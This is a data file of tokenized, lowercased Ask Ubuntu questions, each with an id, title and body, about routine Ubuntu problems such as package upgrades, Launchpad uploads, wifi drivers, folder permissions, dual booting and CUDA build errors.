158635	how to upload a package to launchpad ? ? please help step by step ?	i got this error while uploading . apport is set to ignore crashes in this version of bzr . bzr : error : pycurl.error : ( 28 , 'ssl connection timeout at 297257 ' ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/bzrlib/commands.py '' , line 924 , in exception_to_return_code return the_callable ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/bzrlib/commands.py '' , line 1124 , in run_bzr ret = run ( *run_argv ) file `` /usr/lib/python2.7/dist-packages/bzrlib/commands.py '' , line 689 , in run_argv_aliases return self.run ( **all_cmd_args ) file `` /usr/lib/python2.7/dist-packages/bzrlib/commands.py '' , line 711 , in run return self._operation.run_simple ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/bzrlib/cleanup.py '' , line 135 , in run_simple self.cleanups , self.func , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/bzrlib/cleanup.py '' , line 165 , in _do_with_cleanups result = func ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/bzrlib/plugins/launchpad/__init__.py '' , line 277 , in run account.check_lp_login ( name ) file `` /usr/lib/python2.7/dist-packages/bzrlib/plugins/launchpad/account.py '' , line 106 , in check_lp_login data = _transport.get_bytes ( '~ % s/+sshkeys ' % username ) file `` /usr/lib/python2.7/dist-packages/bzrlib/transport/__init__.py '' , line 610 , in get_bytes f = self.get ( relpath ) file `` /usr/lib/python2.7/dist-packages/bzrlib/transport/http/__init__.py '' , line 126 , in get code , response_file = self._get ( relpath , none ) file `` /usr/lib/python2.7/dist-packages/bzrlib/transport/http/_pycurl.py '' , line 171 , in _get return self._get_full ( relpath ) file `` /usr/lib/python2.7/dist-packages/bzrlib/transport/http/_pycurl.py '' , line 206 , in _get_full self._curl_perform ( curl , header ) file `` /usr/lib/python2.7/dist-packages/bzrlib/transport/http/_pycurl.py '' , line 375 , in _curl_perform curl.perform ( ) error : ( 28 , 'ssl connection timeout at 297257 ' ) bzr 2.3.4 on python 2.7.1 ( linux-2.6.38-8-generic-i686-with- ubuntu-11.04-natty ) arguments : [ '/usr/bin/bzr ' , 'launchpad-login ' , 'nvnvenki ' ] plugins : bash_completion [ 2.3.4 ] , bzrtools [ 2.3.1 ] , launchpad [ 2.3.4 ] , netrc_credential_store [ 2.3.4 ] , news_merge [ 2.3.4 ] encoding : 'utf-8 ' , fsenc : 'utf-8 ' , lang : 'en_us.utf-8' *** bazaar has encountered an internal error . this probably indicates a bug in bazaar . you can help us fix it by filing a bug report at https : //bugs.launchpad.net/bzr/+filebug including this traceback and a description of the problem . launchpad connection is ok no launchpad project set , leave blank to abort . launchpad project name :
158637	access to ntfs using ubuntu as the sole operating system	inherited an old computer . i have formatted 10gb master as fat32 to use without partitioning for ubuntu as o/s . can i format slave hdd 160gb as ntfs and expect ubuntu 12.04 to read and write to it ? any ideas ?
158642	how can i create a bootable usb on mac that is installable on windows ?	i 'm on a macbook and have an old pc with no operating system on it . is it possible to create a bootable usb installation for ubuntu that i can then use to install it on the pc ?
158644	ca n't find purchased apps in kubuntu	i installed kubuntu 12.04 and am trying to install humble bundle through the software center which i installed with the software-center package . i see the games on the recently purchased list , they seem to download and install , but after they are installed , i do n't see anything in my menu and there is no related executable anywhere in my /usr/bin .
158646	dell vostro 3560 no wifi	i just bought new dell vostro 3560 with ubuntu 11.10 and when i upgareded it to 12.04 lts i lost my wifi card . system doesnt see my wifi cards so im not able to install any drivers , etc .
158650	can not install android 2.3 libs dies to missing ia32-libs-multiarch	i need to get my box up to par or android development , but can not get ia32-libs to install for the life of me . can anyone help ? the error android 's tool gave me was stopping adb server failed ( code -1 ) and after a bit of investigation i found that i needed to install the ia32-libs which from my understanding is a pain . ubuntu 12.04 ( x64 ) xxx @ xxx : ~ $ sudo apt-get -f install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages .
158654	bug in firefox address bar autocomplete running on kde	has anyone experienced this graphical glitch when typing in firefox address bar ? the drop-down list is not drawn correctly , with some `` blocks '' missing . after typing more letters or hovering the mouse cursor , the list redraws itself and becomes complete . i 'm running ubuntu 12.04 , firefox 13.0.1 and this only happens in kde ( tested with 4.8.2 , 4.8.3 and 4.8.4 ) . it does not happen in unity or xfce with the same user profile . if i go to the kde control panel and disable the fade effect , the bug starts to happen to almost every menu in the system , including , the taskbar window previews . enabling the âfadeâ effect corrects the bug everywhere except in firefox . i have an nvidia card and i am using the proprietary driver ( current , not current-updates -- not sure about the difference ) , but the linked question on an arch linux forum says this happen with the open source driver and with other cards too . does anyone have an idea for a solution ?
158658	how do i change the permissions of my home folder ?	i am the only administrative user of my computer , for some reason it tells me that i am not the admin , even though i am logged in as the admin user ? ? ? i recently clicked on my home folder 's permissions and it says `` the permissions of `` constantin '' could not be determined . '' what the heck is going on here ? is this some kind of bug ? its very frustrating ! ! !
158660	will a package i compile myself perform better than installing from the repositories ?	does a package performance is different when it 's compiled from sources , or installed from repository ? is it possible , what during the compilation , the package will be `` more adapted '' ( performance , stability ) to your system , if it 's compiled on it ?
158668	how can i allow unprivileged users to shutdown from the panel ? ( no sudo )	i set up an old pc with edubuntu 12.04 for my girls , with an admin account for myself and normal user accounts for both of them . unfortunately , they are not able to shut down the computer by themselves with this configuration . choosing shutdown from the ( unity ) panel menu will log them out , but that 's it . how do i give them shutdown privileges ? please note that they are 5 and 7 years old and just starting to find their way around a computer . solutions that would require them to open a terminal and sudo whatever are not helpful -- and i do n't want them to be able to sudo anything , anyway . i need the panel menu entry `` shutdown '' to work for them .
158671	clean install of ubuntu from flash drive	can i install ubuntu to a newly formatted h/d from the flash drive ?
158672	save openvpn password using network manager	i 'm using network manager on ubuntu 12.04 , with mate as a desktop . the network manager is used to connect to the openvpn server . each time i click to connect to the openvpn server , i 'm required to type in a password . is there a way to save this openvpn password , so i do n't have to write it each time . especially since it is different from by sudo password , so sometimes i type in the wrong one .
158679	2 internet connections on a single pc	if i have a wireless and a usb internet connection on my ubuntu 12.04 as in : at the moment , ubuntu seems to only make use of the wired connection which is the usb connection . is it possible to get ubuntu to use the wireless connection without unplugging the wired connection ? so basically , as will , i would like to switch between the connections without unplugging any of them while leaving them both enabled . is this possible ?
158682	how do i allow a standard user to update the kernel modules for vmware ?	i 've set up vmware player for my wife . every once in a while ( notably after a kernel update ) , the vmware player needs to be compiled into the kernel . my spouse does not have su- activated ( if anybody screws up the os , it 's going to be me ) . i 'd like to give her permission to do this , but only for that program . is this possible ? can it be done safely ( for the os ) ? how can it be done ? edit : i tried to add the following to visudo guijunkette all= ( all ) nopasswd : /usr/bin/vmware-modconfig when running with her user , after typing her password , the following error occurred : so , in the end , no cigar . edit : i 've given up on vmware player and moved to virtualbox . made a clean install .
158684	html in pidgin conversations	is there a plugin or hidden feature in pidgin that parses html in chats ? i could n't find anything on the web .
158688	how do i include image in my app from a url ?	how do i add particular images which is situated in given url , in my app , can i do it in glade ?
158690	ambiance theme looks wrong after trying out gnome shell	i tried gnome-shell out recently , and since the ambiance theme just looks plain ugly on it , i used gnome-tweak-tools to change the window and gtk theme to adwaita . so , after that , i went back to unity and obviously changed it back to ambiance , still using gnome-tweak-tools . now , in certain apps , i find white space between the window borders and content . due to my limited english , i wo n't be able to properly describe what happened , so i guess i 'm just going to show it using a screenshot . it 's like , nothing that bad . but it just looks so ugly . so , can anyone help me ? i 'm on ubuntu 12.04 also .
158694	truly share a folder with multiple users on a computer	i have a folder in my home directory that i want to be truly shared between all users on the same computer . so , i set the permission to be 777 . now , all users can access it and can create , , edit , delete files in it . however , i do not have write access to files created by other users . how do i ensure that all files ( existing as well as newly created/ copied ) have rwx access to all users ?
158695	is it normal for a 14gb vhd file to be converted to a 100gb+ bin file ?	i want to convert a vhd-file to vdi and found a manual which says i have to convert the vhd first to bin . but qemu-img creates a 130gb file ( even if theres not enough space on disk ) from the 14gb vhd-file . is this a common behavior ?
158701	how to change vuze download directory ?	how to make vuze my default bittorrent program instead of transmission and change its default download directory ?
158702	why are all videos jerky on an intel 845g graphics controller in 12.04 ?	currently i am using lubuntu 12.04 desktop installed on my pc . when i play videos , the videos are really slow . it skips frames i have following pci devices installed on the system host bridge : intel corporation 82845g/gl [ brookdale-g ] /ge/pe dram controller/host-hub interface ( rev 03 ) vga compatible controller : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 03 ) ( prog-if 00 [ vga controller ] ) xserver-xorg-video-intel and mesa-utils packages are installed . direct rendering is enabled . it really does n't matter if it is enabled or not , both the times the videos are slow almost similarly . while looking for a solution i found a page on intel drivers http : //manpages.ubuntu.com/manpages/precise/man4/intel.4.html which deals with intel graphics drivers . is there any way changing the videoram to higher value can be helpful ? currently agp memory is 128 mb and from the above manpage videoram will be set to 8m if agp > =128mb . 82845g has a agp memory of 128mb . is there anyway i can increase videoram ? i have tried ubuntu with agp memory 256mb , where videoram will be set to 24mb by default , the hd videos are also playing smoothly even though the processor is intel celron 1.6ghz . is there anything i can do to increase videoram size ? or is this because of something else ? a commentor asked me to attach outputs of dmesg , lsmod , lshw and /var/log/kern.log . here is the output of those commands http : //paste.ubuntu.com/1071664/
158703	ca n't upgrade from 10.10-11.04	when trying to upgrade from ubuntu 10.10 to ubuntu 11.04 i got this error during update w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) , e : some index files failed to download , they have been ignored , or old ones used instead . i have no clue about computers .
158715	how do i call a function in quickly ?	how to call function in quickly ? here is my code : def finish_initializing ( self , builder ) : # pylint : disable=e1002 super ( projectwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutprojectdialog self.preferencesdialog = preferencesprojectdialog def test ( self , widget ) : print `` clicked '' def on_mybutton_clicked ( self , widget ) : test ( ) the following error i get : nameerror : global name 'test ' is not defined
158718	why ca n't i compile the ralink wireless driver on 12.04 ?	i 'm an ubuntu 12.04 user and my wireless network card ( d-link wireless n 150 desktop adapter dwa-525 ) has always worked well with the driver suggested here , however this morning i updated the generic kernel ( as suggested by upgrade manager ) to version : 3.2.0-26 and suddenly wireless stopped working . it is n't totally unexpected , in fact the following commands used to solve the problem : sudo su cd /home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217 make clean make make install modprobe rt3562sta exit ( where /home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217 is the path to the driver ) unfortunately , today i got the following error ( s ) while issuing the make step : root @ jarvis : /home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217 # make make -c tools make [ 1 ] : entering directory `/home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/tools' /home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/tools/bin2h cp -f os/linux/makefile.6 /home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux/makefile make -c /lib/modules/3.2.0-26-generic-pae/build subdirs=/home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217/os/linux modules make : *** /lib/modules/3.2.0-26-generic-pae/build : no such file or directory . stop . make : *** [ linux ] error 2 root @ jarvis : /home/jose/dpo_rt3562_3592_3062_linuxsta_v2.4.1.1_20101217 # i was wondering if somebody knows how to solve this problem ? i honestly do n't know what to do about it . thank you very much in advance for all the help . j
158721	which xorg driver ( not kernel driver ) to use with gma500/poulsbo video hardware in 12.04	i have a asus eeepc with a gma500 video card . i followed the instructions on https : //wiki.ubuntu.com/hardwaresupportcomponentsvideocardspoulsbo/ , which made the netbook boot correctly . without any xorg.conf file , xorg uses the vesa driver , which is quite slow . manually specifying fbdev as driver in xorg.conf also works . which one should i use ? are there any other drivers for xorg that do better at 2d accelleration ( since the kernel driver does n't support 3d acceleration ) ?
158727	must apps submitted to the software center run from the /opt directory ?	i read this question , but i 'm more confused yet . in developer.ubuntu.com/showdown i read : `` ( 2 ) run out of /opt '' ( i understand `` run out '' is not in /opt *am i wrong ? * ) in https : //wiki.ubuntu.com/appreviewboard/review/guidelines # packaging i read : `` our package should install most files in /opt/extras.ubuntu.com/ '' it 's not clear for me if the app must be in the /opt or out /opt : $ then , can i use the /usr ? will be the app rejected if it 's on /usr ?
158728	screen goes blank after installation and boot menu ubuntu 12.04 ( windows installer )	well my problem is taht after installing ubuntu , i restart my computer , and select ubuntu from the boot screen , the screen goes a purple color for a fraction of second and then it changes to black with a white blinking underscore on the top left , i have an hp notebook so i tried using usb with no results , then i tried the windows one , installed and reinstalled like 3 times , help .
158735	how to set permissions so that i can read and write to another partition ?	i m using ubuntu 12.04 and i have to partitions part1 and part2 , both are ext4 . i want to transfer media files to and from them freely through programs .
158739	how do i upload a .deb created by debreate to my ppa ?	i made a program using qt creator , and i made a package ( .deb ) using debreate . now i want to know how to upload this on ppa . i already created ppa on launchpad .
158746	how do i make `` add icons to the desktop '' work in 10.04 ?	this question is closely related to other two questions : `` how to add a shortcut on desktop '' and `` how do i add icons to the desktop in 10.04 ? '' ( this being a closed question ) . and i know the answers mentioned there ! the problem is it is not working . i just made a fresh ubuntu 10.04 install a couple of days ago . everything works fine for the main user : i can paste anything to the desktop , and it just works . but i have created another user - as simple as it can be ( no special settings ; i just created a non-admin user and set its password ) . then , i logged in using this other user account . i just want to create a link for a `` games '' folder , for my son , and i simply ca n't ! it does n't accept `` paste '' , and the right button mouse click does nothing . i have made several ubuntu installations , several user accounts , and this never happened to me before ! i tried to search some configuration/setting to fix it , but found nothing . i had to use the `` preferences '' menu to be able to change the background/wallpaper image . if i paste files / folders / links to the `` desktop '' file system folder , it works ( i.e. , the files are copied / moved to the `` desktop '' folder ) , but nothing appears in the desktop screen ! and , what impressed me most , i found nothing searching on google and ask ubuntu - i thought this would be a common issue ... has anybody experienced this ? any clue to make the desktop just working normally ? remembering : all works fine for the first user ( the admin user created when installing the system ) . thanks .
158749	how do i change the creation/mod date of all folders on a usb drive using touch command ?	i 've got a usb drive with mp3 music on it that i play in my car . my car has a usb drive port . problem is that the car sorts the music by creation/modification date ( and not alphabetically ) . this makes it a pain to find what artist i 'm looking for . to solve this problem , i need a way to `` update '' the creation/modification date for all folders on the usb drive every time i add a new folder of music to the usb drive . anyone know how i can do this ? the touch command works great , but the format touch < filename > would take forever to do on each folder on the drive . anyway to select all folders on the drive and then touch < all folders > ? on my usb drive i have a folder for each album and the songs within each respective folder , like so : album-1-folder album-2-folder i need to apply the touch command to each of the `` album '' folders on the drive . i stumbled upon a simple solution to solve this issue : touch /media/usb_drive/*
158754	google chrome window resizes when click 12.04 kde	all windows work fine but maximized g. chrome window starts moving whenever i click under title bar without moving the cursor , but i do n't want to move the windows , just to focus . under the title bar is next to the tabs , on the blue part . this is annoying . it goes from maximized to moving windows function , with the cross instead of the pointer , only with single steady click . using kde 4.8.4 , kubuntu 12.04 . something like this http : //code.google.com/p/chromium/issues/detail ? id=37013 . how to solve this ?
158758	global menu stopped working for most applications	i have ubuntu 12.04 32 bits and i had been enjoying global menus and hud since the beginning . however , for some strange reason , i stopped having global menus for most applications and thus no hud fun anymore . actually , the only two applications where i continue to have global menus are thunderbird and firefox , so not sure if it has something to do with these two ... i 've already browsed through some similar reports and already tried the following : checking if indicator-appmenu was installed . tried to use unsettings to switch on and off , with reboots in the middle , global menus . logged in with a different user to see if it was some configuration of my user . also checked , using dconf-editor that , com → canonical → indicator → appmenu → menu-mode = `` global '' any hint/help would be appreciated !
158765	powerpc macs and 12.04 lts application support	so , i have an older computer sitting in the closet , a powermac g5 tower . a great machine , a whole lot better than my dell that i 'm currently using , so my question is , with a powerpc processor would the application support here on ubuntu work with out the issues of osx 's terrible drop in application support ? would say , super meat boy from the software center work ? or is all that computer good for is web browsing ? in other words , can a powerpc g5 processor work with ubuntu applications , or is it doomed to be without support from all providers ?
158768	attempt to upgrade is failing due to unstable mfc6490cwlpr : i386	i am attempting to upgrade to the most recent ubuntu os but i am being stopped with warning that mfc6490cwlpr : i386 is in a very bad inconsistent state . the warning suggests that i should reinstall before i remove this pkg . the following is my attempt to do so . dpkg : warning : overriding problem because -- force enabled : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . ( reading database ... 284218 files and directories currently installed . ) removing mfc6490cwlpr : i386 ... start : unknown job : lpd dpkg : error processing mfc6490cwlpr : i386 ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : mfc6490cwlpr : i386 me @ mycomp-studio-1737 : ~ $ ^c kingston @ kingston-studio-1737 : ~ $ sudo dpkg -- configure -a [ sudo ] password for me : dpkg : dependency problems prevent configuration of mfc6490cwcupswrapper : i386 : mfc6490cwcupswrapper : i386 depends on mfc6490cwlpr ; however : package mfc6490cwlpr : i386 is not installed . dpkg : error processing mfc6490cwcupswrapper : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mfc6490cwcupswrapper : i386 me @ mycomp-studio-1737 : ~ $ sudo apt-get install mfc6490cwcupswrapper : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mfc6490cwcupswrapper : i386 needless to say ... i have had no luck . can anyone guide me through this ?
158770	`` unable to locate package '' errors for all software	my apt-get does n't install any programs . i try to install programs with apt-get install but always it shows same error : unable to locate package . for example i try to install the xbmc media center ; here 's what happens : $ sudo apt-get install xbmc reading package lists ... done building dependency tree reading state information ... done e : unable to locate package xbmc i have updated my package list with sudo apt-get update .
158771	i lost my boot selection menu screen	i recently had a problem i have both ubuntu and windows 7 on my laptop side-by-side . when i boot up my computer i am shown a boot screen to choose between ubuntu and windows . then i formatted the partition that had windows . but in the boot menu , windows still appeared , but of course it 's not really there , so if choose windows , it tells me something like wrong boot record . i have 3 partitions on my laptop : 50gb - ubuntu 100gb ext4 80gb also ext4 recently , i formatted the 80gb partition and changed the file system to ntfs and i installed windows there . but now the boot menu is gone , although i have ubuntu installed ! how can i get that boot screen back ?
158776	how can i know if my an application on my desktop environment is loading other de 's modules , libraries , etc ?	i read this question and it 's answer about multiple desktop environments and how they might impact system performance and was wondering : how do i know if i 'm using an `` application which loads the other de 's modules , libraries etc '' ?
158778	why does ubuntu have about 2x shorter battery life than os x on macbook ?	ubuntu 12.04 has about 2x shorter battery life than os x on my macbook pro 2010 . what are the technical reasons for this ? is it because os x uses some hidden firmware features ? can linux somehow emulate os x power saving behavior ?
158781	how to change fat32 sort order on drive ?	i use a usb drive to play music in my car . unfortunately , the car does not sort the music alphabetically and relies on how the music is sorted on the fat32 drive . this windows software here solves the problem . anything comparable available for me on ubuntu ? ps : at first i thought it was a file creation date problem askubuntu question . but although i figured out the answer to that question , it did n't solve the problem like i thought it would .
158782	who chooses the default programs ?	i was curious who decides which programs will be the default . for example thunderbird instead of evolution , or rythmbox instead of miro . i know how to set default programs this is n't related to that . i am curious about the specific programs chosen for the distribution at time of packaging the iso and does the community have any way to make suggestions ?
158784	make a live usb of your installed ubuntu	i wonder that whether there is a way of making my own installed ubuntu a live usb . the reason in fact is that i want to make my ubuntu to be used by anybody . after this guy used my ubuntu i do not want to see his garbage on my ubuntu . i want to see my ubuntu how it was looking before i gave it to him . therefore , i have assumed that it is the best way of avoiding this problem . edit : okay let me clear my point . lets assume i want to make a internet cafe-like system . every user will be able to enter via only one user account to linux . however , i do not want them to leave anything behind . whenever this ubuntu is booted , i want to this system remove their garbage . why i mentioned the live usb is that i have seen that live usb or cd makes what i want but not exactly because i want to install some apps on it and make some confugration like firewall , permissions . the problem with using just the guest session is that it does not obey my rules like firewall , my limitation on the apps and so on .
158787	error in oracle 11g installation in ubuntu 12.04lts	while installing oracle 11g in ubuntu 12.04 lts , it showing error as universal installer can not run under root . how can i solve this problem ? ? please help me .
158788	dual boot with common shared space for storage folders	i want to install a dual boot , ubuntu and windows 7 but i want to be able to access my stored files , documents , music , pictures etc from either os . i already have ubuntu installed so if there 's away without re-installing i am , as you might have guessed new to ubuntu so its all a bit new and strange . if there is a nice step by step tutorial .
158789	how do i get the classic file structure display in 12.04 file manager ?	new 12.04 installation : how do i set up a classic file access display , with drives and folders ? i may grow to like the default setup but until then i would like the familiarity of the older system .
158790	how to submit article in reddit for the app showdown ?	why i ca n't submit an article in reddit ? is n't it approved or what ? i see it in my profile , but i do n't see it in new articles ...
158793	how do i install the btrfs-restore utility on 12.04 ?	i would like to install btrfs-restore on kubuntu 12.04 apt-cache search btrfs-restore returns nothing . google `` ubuntu download or install btrfs-restore '' returns nothing useful . also , where do i get btrfs help ? i 'm not getting any replies on # btrfs on freenode.net . ( correction : i was too impatient . # btrfs was very helpful ! ) update : the previously accepted answer no longer works , so i unselected it as the answer . the ppa dmitrij.ledkov/ppa is missing now . thanks to pkunk at # btrfs , i posted a new solution below .
158795	how do i install and use the bluetile window manager in 12.04 ?	i 've been working on getting bluetile working on 12.04 so i can start down the path of tiling windows managers , but i have been having limited success . i have read the ( only 7 ! ) other posts on bluetile and tried the website , but unfortunately nothing seems to address precise thoroughly enough for me to get it working . i have tried getting gnome running on my machine via apt-get and following basic instructions from there , but without success . the apt-get for bluetile also fails ( on selecting the 1gnome-bluetile` session option , unity ends up opening anyway in a buggy , unstable way ) . i also messed around with specifying a custom xsession for lightdm to look at and setting the window-manager to bluetile , but again without success- somehow i ended up in unity again . i can confirm that installing bluetile on a vanilla ubuntu instance does add gnome + bluetile to the lightgdm 's menu , but selecting it does nothing - it just boots into unity . what should i do ?
158797	forcing zeitgeist to index dropbox folder	i am running ubuntu 11.10 , and i would like to force zeitgeist to index my dropbox folder . i understand that zeitgeist is a passive service that logs particular events ( such as opening or downloading files ) for later searches , but i have large dropbox folder that was downloaded without being logged by zeitgeist . short of manually opening and closing all files in my dropbox folder , is there a way to have zeitgeist index this folder so that i can later search it using the dash ? thanks !
158802	ubuntu 12.04 `` stuttering ''	when i log in to the desktop ubuntu seems to `` stutter '' . doing pretty much anything causes the cursor to freeze for a few seconds , and the rest of the screen updates something like every 15 seconds ( during these 15 seconds i can still move the cursor ) . for example , opening the home folder i first see no effect , followed by a semi-transparent home folder , and finally the folder as it should be ( this can take like 30 seconds ) ; no animation , just three individual frames . also , i sometimes do n't see a window for a program , even though the program in question is supposed to be `` up '' . since this is my first experience of linux , i confess i have no idea where to start - searching the web i only found problems with complete freezes/crashes requiring rebooting , as opposed to this `` stuttering '' . i installed ubuntu 12.04 32bit from a bootable usb stick a couple of days ago , right after a fresh vista 32bit install . thinking the stuttering might stop if i updated ubuntu , i managed to install approx 270 updates through the update manager , but the stuttering was still there . apart from the updates , i have n't installed any software other than what was included on the bootable usb stick . vista and ubuntu are on a single crucial m4 ssd , in a dual-boot setup , with grub . cpu : intel core 2 quad q6600 gpu : nvidia geforce 8800 gtx ( with the recommended proprietary drivers ) ram : 2gb ddr2
158803	what is the password for downloading games ?	i am trying to get a game called torcs and supertuxkart and it says to add or remove software the super user has to take the action and i have edubuntu.so what is the password ?
158806	`` size mismatch '' error while downloading packages	i 've been having this annoying problem lately since i did a fresh install of 12.04 . it started when i was installing vlc from the ubuntu software centre a few weeks ago . i kept getting this error with packages with `` size mismatch '' . this happened with many other programs later on . i just got around it by downloading the packages separately and installing them that way . now i get two updates for packages i installed in that manner . i tried changing from where i download the packages , it did n't change anything . if anyone can help me with my issue it would be splendid .
158808	how do i run two different conky sessions at the same time ?	i want to run conky lua ( link to conky lua on gnome-look.org ) and conky : metro clock ( link to conky : metro clock on devianart.com ) at the same time . i want to have them both on the start up applications . i know how to install them individualy , but i am having a rough time finding out how to get them simultaneously . i 'm running ubuntu 12.04 , unity desktop environment .
158811	how to disable autologin if the desktop is not functioning ?	i have tried to login to a desktop that is not fully functioning . i want to get back to ubuntu - i can do this if i could boot to the user login screen - how can i force this at boot ? thanks .
158815	how can i have quick access the music controls ?	i 'm coming back to ubuntu and wow , a lot of things have changed since version 9 . there is one thing that really annoys me . back in the good old days where you can set up your desktop as you wanted , there was a tiny applet called music-applet so you can have the controls of the music player on the panel . so if you wanted to hear another song , just click the > > arrow and that was really easy . ubuntu 12.04 needs one click on volume indicator and then click con the next arrow from the dropdown menu . i was wondering if there is a way to at least , just hover the volume indicator so the dropdown menu shows up and you click the next song arrow . maybe there are other ways to change songs quickly ?
158819	what packages are safe to uninstall to reduce installation size ?	this question is similar to a previous question i asked how can i turn my desktop ubuntu 8.04 into a command line only install ? . i was wondering if anyone can recommend any other bulky packages from the standard 8.04 installation that can reduce the size on disk of my installation . all i really require is socket functionality , g++ and gcc , some kind of text editor and ssh client and server . things that i do n't require are things like media players , audio packages , and the more `` superficial '' kind of desktop niceties . is there anything particularly large in a standard install that is safe for me to remove without compromising my requirements above ? i am a bit apprehensive about trying to uninstall items and i am not totally confident about removal of particular things having a negative effect on the functionality of any other things i might need ( an example is would it be safe for me to remove everything to do with perl , or does the system/kernel/other processes require this ) ? ? ? basically i would like to be left with the kind of items that would have been installed in the cli version of 8.04 ( had the alternative iso image not been faulty ) . any help/suggestions would be gratefully received .
158822	installing cuda on ubuntu 12.04 with nvidia driver 295.59	i have been trying to get cuda to run on a nvidia gt 650m based laptop . i am running ubuntu 12.04 with the nvidia 295.59 driver . also , my laptop uses optimus so i have install the driver via bumblebee . bumblebee is not working correctly yet -- however i believe it is possible to install cuda independently . to install cuda i have followed the instructions detailed here : how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? however i am still running into problem building the sdk . i made the changes specified at the above link in common.mk , but i got the following ( snippet ) from the build process : make [ 2 ] : entering directory `/home/john/nvidia_gpu_computing_sdk/c/src/fluidsgl' /usr/bin/ld : warning : libnvidia-tls.so.302.17 , needed by /usr/lib/nvidia-current/libgl.so , not found ( try using -rpath or -rpath-link ) /usr/bin/ld : warning : libnvidia-glcore.so.302.17 , needed by /usr/lib/nvidia-current/libgl.so , not found ( try using -rpath or -rpath-link ) /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv018tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv012glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv017glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv012tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv015tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv019tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv000glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv017tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv013tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv013glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv018glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv022tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv007tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv009tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv020tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv014glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv015glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv016tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv001glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv006tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv021tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv011tls' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv020glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv019glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv002glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv021glcore' /usr/lib/nvidia-current/libgl.so : undefined reference to `_nv014tls' collect2 : ld returned 1 exit status make [ 2 ] : *** [ ../../bin/linux/release/fluidsgl ] error 1 make [ 2 ] : leaving directory `/home/john/nvidia_gpu_computing_sdk/c/src/fluidsgl' make [ 1 ] : *** [ src/fluidsgl/makefile.ph_build ] error 2 make [ 1 ] : leaving directory `/home/john/nvidia_gpu_computing_sdk/c' make : *** [ all ] error 2 the libraries that ld warns about are on my system and are installed on the system : $ locate libnvidia-tls.so.302.17 libnvidia-glcore.so.302.17 /usr/lib/nvidia-current/libnvidia-glcore.so.302.17 /usr/lib/nvidia-current/libnvidia-tls.so.302.17 /usr/lib/nvidia-current/tls/libnvidia-tls.so.302.17 /usr/lib32/nvidia-current/libnvidia-glcore.so.302.17 /usr/lib32/nvidia-current/libnvidia-tls.so.302.17 /usr/lib32/nvidia-current/tls/libnvidia-tls.so.302.17 however /usr/lib/nvidia-current and /usr/lib32/nvidia-current are not being picked up by ldconfig . i have tried adding them by adding a file to /etc/ld.so.conf.d/ which gets past this error , however now i am getting the following error : make [ 2 ] : entering directory `/home/john/nvidia_gpu_computing_sdk/c/src/devicequerydrv' cc1plus : warning : command line option â-wimplicitâ is valid for c/objc but not for c++ [ enabled by default ] obj/x86_64/release/devicequerydrv.cpp.o : in function `main ' : devicequerydrv.cpp : ( .text.startup+0x5f ) : undefined reference to `cuinit' devicequerydrv.cpp : ( .text.startup+0x99 ) : undefined reference to `cudevicegetcount' devicequerydrv.cpp : ( .text.startup+0x10b ) : undefined reference to `cudevicecomputecapability' devicequerydrv.cpp : ( .text.startup+0x127 ) : undefined reference to `cudevicegetname' devicequerydrv.cpp : ( .text.startup+0x16a ) : undefined reference to `cudrivergetversion' devicequerydrv.cpp : ( .text.startup+0x1f0 ) : undefined reference to `cudevicetotalmem_v2' 